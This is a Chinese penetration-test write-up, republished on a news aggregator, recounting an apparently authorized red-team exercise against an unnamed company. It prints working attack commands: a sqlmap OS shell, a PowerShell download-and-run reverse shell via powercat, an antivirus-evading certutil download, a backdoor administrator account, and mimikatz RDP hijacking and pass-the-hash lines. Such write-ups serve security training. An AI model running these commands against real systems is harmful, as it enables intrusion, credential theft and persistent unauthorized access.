Redian新闻
>
记一次对某企业的渗透测试

记一次对某企业的渗透测试

科技

声明:本次演练中,所有测试设备均由主办方提供,所有流量均有留档可审计,所有操作均在授权下完成,所有数据在结束后均已安全销毁。


前言

某次攻防演练中,主办方只提供了目标企业名称,其他信息都需要自己收集,这篇文章记录一下渗透过程。

信息收集

既然只有目标名称,name首先根据提供的名称去查询下备案域名。一般常用的就是工信部ICP/IP地址/域名信息备案管理系统

https://beian.miit.gov.cn/

是比较精准了,但是每次查询都要点击验证码,对于我这种懒人来说还是感觉比较麻烦~ 个人使用次数比较多的是

https://www.beianx.cn/

这个网站优点就是很少触发验证码识别,缺点可能信息更新不及时/不全面,跟前一个网站可以配合着用 查询到目标备案域名后,可以在fofa、hunter上进行信息收集,或者使用谷歌语法

site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

在对主站及子域进行相关测试后,并没有发现可以利用的点;使用nmap对子域IP进行全端口探测,发现如下信息系统:

SQL注入上线CS

使用burp爆破弱口令未果;遂尝试SQL注入,发现漏洞存在且为DBA权限

直接os-shell,但是看不到回显

sqlmap.py -r 1.txt --os-shell

可以通dnslog,但是尝试powershell上线失败

通过powershell反弹cmd

  • • powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。被攻击端运行命令

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c **** -p **** -e cmd

攻击端用nc监听即可反弹出cmd。

然后使用certutil下载cs上线程序,然后执行上线。certutil是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。但是该命令的使用会引发杀毒软件的查杀,所以在实际渗透中需要将该命令做一定的免杀处理,比如

c""""e""""r""""t""""u""""t""""i""""l.exe -urlcache -split -f http://ip/6666.exe 6666.exe

提权&&内网横向

当前用户是SqlServer权限,不利于下一步的内网横向,所以要先提权,执行systeminfo可知当前为server2012系统。当前可以考虑使用BadPotato提权(提权脚本见知识星球)

当前被控机已提权至system权限,一般我们可以在CS上注入一个进程简单做一下权限维持 在CS客户端会话上

邮件-Explore-Process List-在加载出的系统进程中选择一个常见程序-下方选择Inject

至此系统提权和权限维持已完成,因为是server2012 R2版本,也没有啥比较好的办法去读密码,个人一般选择加用户或者激活guest然后搭代理登3389。添加用户:

net user aaa 123qwe... /add

这就添加了一个用户为:aaa密码为:123qwe...的用户了 第二步 将此用户提升为管理员:

net localgroup administrators aaa /add

管理员账户已经添加完成,看看受控机是否启用远程桌面连接

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

0x1表示关闭;0x0表示开启

查一下远桌面服务开在了哪个端口

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

之后再通过计算器来将16进制转10进制即可:

现在该有的权限、管理员账号、3389都具备了,用frp或者nps搭个代理就可以连接内网服务器了。但是还没有拿下服务器的管理员桌面,可以考虑使用rdp劫持

privilege::debug #提权 
ts::sessions #查看当前主机的会话
token::elevate #提升本地管理员权限为system 
ts::remote /id:2 #劫持id为2的会话

或者

privilege::debug 
sekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5 "/run:mstsc.exe /restrictedadmin"

(手头上没有合适的机器复现了,暂且找了张图凑合看吧,图文无关~)

现在管理员桌面也搞定了,然后直接上Tscan扫内网,等待的时间可以翻翻mstsc连接记录、浏览器历史记录和记住的账号密码。这个内网资产还可以,毕竟是大企业内网而且防护相对比较薄弱,刚好Tscan的POC比较多,比较适合刷分。这里就不再一一放图了~

工具下载

Tscan和提权脚本已同步知识星球。


往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
史上最大图灵测试实验完成!150万人类参与1000万次对话,判断对面是人还是AI一次对小程序的安全测试长篇小说《如絮》第一百一十七章 旧金山-越南-1956-1962年 1 参军受贿超9000万,县委原书记一审获刑无期教授码农孰优孰劣?年仅27岁,追记一等功记一次容器环境下出现Address not available甘肃上一次骆驼累死,是为中国首次对外开放谈过一次对的恋爱,才知道的13件事。| KY漫画谈谈LLM在推荐域的渗透,探索推荐新范式深层渗透,直达痛点,贴合痛处渗透深层关节!她出国度假搭Uber,忘记一操作,55刀变3万美元惊人车费大家都变老了我将五十年的纪录片理念,最后一次对中国学员和盘托出......ChatGPT推出自定义指令:说一次就记住,每次对话都能遵守错过它,可能遗憾终身!这8大毕业旅行首选地,更高性价比,美景足以铭记一生,选一个出发吧~更鼓励民营企业的繁荣壮大,是解决青年人就业的唯一之路年仅27岁,追记一等功!实战总结|记一次glibc导致的堆外内存泄露“童年广告词有多洗脑?”网友:好家伙看完能记一辈子哈哈哈哈鲁迅先生和他的阿Q一早的偶遇今天才明白长期不关机和每天关机一次对手机的影响,多亏手机店员告知,还好知道的及时美国深海潜水器发生内爆;​美国恐怖组织成员奉命渗透到越南;“男员工全裸被绑住”视频热传,日本企业承认霸凌并道歉 | 每日大新闻从有到无的渗透“文化传承发展 探源中华文明”新时代大讲堂侧记:一次对红山文化内涵的再丰富再拓宽一周AIGC热点 | Gartner 公布AI在企业的渗透率最新调查结果朱一龙,你又完成了一次对自己过往表演的“极致颠覆”。给父母上课:我教我爸第一次对我妈说出了「对不起」亿级别大表拆分 —— 记一次分表工作的心路历程实战总结|记一次消息队列堆积的问题排查难忘|这10条自驾公路过分美丽!去一次铭记一生!混沌创新盛典记一——欧爷春季演讲:我们愿做罗塞塔号一次善良,是别人可以记一辈子的感动惊曝某企业多人集体嫖娼,被抓!
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。